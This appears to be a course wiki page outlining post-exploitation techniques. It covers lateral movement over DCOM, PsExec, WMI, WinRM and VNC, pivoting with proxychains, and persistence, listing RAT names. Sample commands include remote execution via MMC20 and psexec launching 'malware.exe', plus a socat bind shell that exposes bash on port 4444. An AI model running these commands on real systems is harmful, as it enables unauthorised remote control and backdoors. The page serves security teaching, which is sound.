Post Exploitation - Paiet/SEC-335 GitHub Wiki

Lateral movement

• CLI Shell Access
  • RSH/Rlogin
  • Telnet
  • SSH
• Remote Management Services
  • Blackhat pdf: https://tinyurl.com/gu5zduj
  • RPC/DCOM
    • Distributed Component Object Model
    • Using PowerShell
      • $obj = [activator]::CreateInstance([type]::GetTypeFromPRogID("MMC20.Application","10.0.0.224"))
      • $obj.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,"7")
      • https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object
    • Not likely to work
      • Modern AV/Firewalls will detect and block
  • PsExec
    • Uses SMB to issue commands
    • psexec \\10.0.0.224 -s "C:\malware.exe"
  • Windows Remote Management(WinRM)/WMI
    • wmic /node:10.0.0.224 computersystem get username
  • Scheduled tasks
  • PS remoting/WinRM
    • Invoke-Command -ComputerName 10.0.0.224 -ScriptBlock { Get-ChildItem C:\Windows\System32 }
• GUI Shell
  • RDP
  • Apple Remote Desktop
  • VNC
    • vncviewer 10.0.0.165
    • Password = "password"
  • X-server forwarding
    • ssh -X 10.0.0.165
    • Run X program
      • xcalc
      • x-www-browser

Pivoting

• Proxychains

Persistence

• Scheduled jobs
• Scheduled tasks
• Daemons
  • nuhup socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane &
• Back doors
• Trojan
  • RAT
    • Sub7, DarkComet, TheFatRAT, Pupy,
• New user creation